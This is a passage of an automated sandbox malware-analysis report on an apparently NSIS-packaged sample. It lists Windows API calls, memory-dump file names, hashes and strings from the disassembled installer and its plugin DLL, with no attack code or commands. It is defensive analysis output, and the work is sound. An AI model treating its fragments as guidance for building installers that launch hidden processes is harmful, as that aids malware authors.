                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                              • Part of subcall function 7013121B: GlobalAlloc.KERNELBASE(00000040,?,7013123B,?,701312DF,00000019,701311BE,-000000A0), ref: 70131225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70132657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 7013268C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 90d454ec794e69e8420dfbd5177a0f261894d7ddbc78a1cf4ceed39ed10283a6
                                                                                                            • Instruction ID: 8b8fa74ff3a6e59f7701b0462c7f02ac5a9b8b85ec0f90cee43655f3b194c6d1
                                                                                                            • Opcode Fuzzy Hash: 90d454ec794e69e8420dfbd5177a0f261894d7ddbc78a1cf4ceed39ed10283a6
                                                                                                            • Instruction Fuzzy Hash: 9C31F2B2204001DFC71AAF55CC95D6EFBBAFF85300BB141ADFA4293A20C731A815DB61
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsd88AD.tmp$C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll
                                                                                                            • API String ID: 3109718747-2136423328
                                                                                                            • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                            • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 93c1ccb94f0a3f16ffdf8c399febb3ca813556de7ba4acc9198260fa2a67602c
                                                                                                            • Instruction ID: e417d38b96ff50fcdd5a7380dbf3d819696ed38f24075ecd4173d8bda24ec2bf
                                                                                                            • Opcode Fuzzy Hash: 93c1ccb94f0a3f16ffdf8c399febb3ca813556de7ba4acc9198260fa2a67602c
                                                                                                            • Instruction Fuzzy Hash: D751C832D010D99ECB029FA4C9405ADFFBAFB44356FD3865DE406A3744D671AE818791
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701324D6
                                                                                                              • Part of subcall function 7013122C: lstrcpynW.KERNEL32(00000000,?,701312DF,00000019,701311BE,-000000A0), ref: 7013123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 7013245C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70132477
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 4216380887-0
                                                                                                            • Opcode ID: 7ae9c6150bafc530720193d7afddbe583c6d26ea7055598601726739f0d2c37e
                                                                                                            • Instruction ID: 9da26806ab2c501cba45a327866c7b75f7c51f2f13e7b54e129ff67f80ec545f
                                                                                                            • Opcode Fuzzy Hash: 7ae9c6150bafc530720193d7afddbe583c6d26ea7055598601726739f0d2c37e
                                                                                                            • Instruction Fuzzy Hash: F841E0B2104305EFC314EF21DC44A6EF7B8FB58320FA188ADF54687A51EB74A444DB61
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701321EC,?,00000808), ref: 70131635
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,701321EC,?,00000808), ref: 7013163C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701321EC,?,00000808), ref: 70131650
                                                                                                            • GetProcAddress.KERNEL32(701321EC,00000000), ref: 70131657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70131660
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: e3d2ae584c85d3d26b31ed9cb3a33420b486ac8a3ea7e2cad347eb7fbce0d881
                                                                                                            • Instruction ID: 864c19d98ffa426ebde93c02d3b1d3502b10819bfa3c8e87a71b6c04741d3a63
                                                                                                            • Opcode Fuzzy Hash: e3d2ae584c85d3d26b31ed9cb3a33420b486ac8a3ea7e2cad347eb7fbce0d881
                                                                                                            • Instruction Fuzzy Hash: 2AF0AC732061387BD62117A78C4CDDBBE9CDF8B2F5B210225F728925A086A65D01D7F1
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-4083868402
                                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
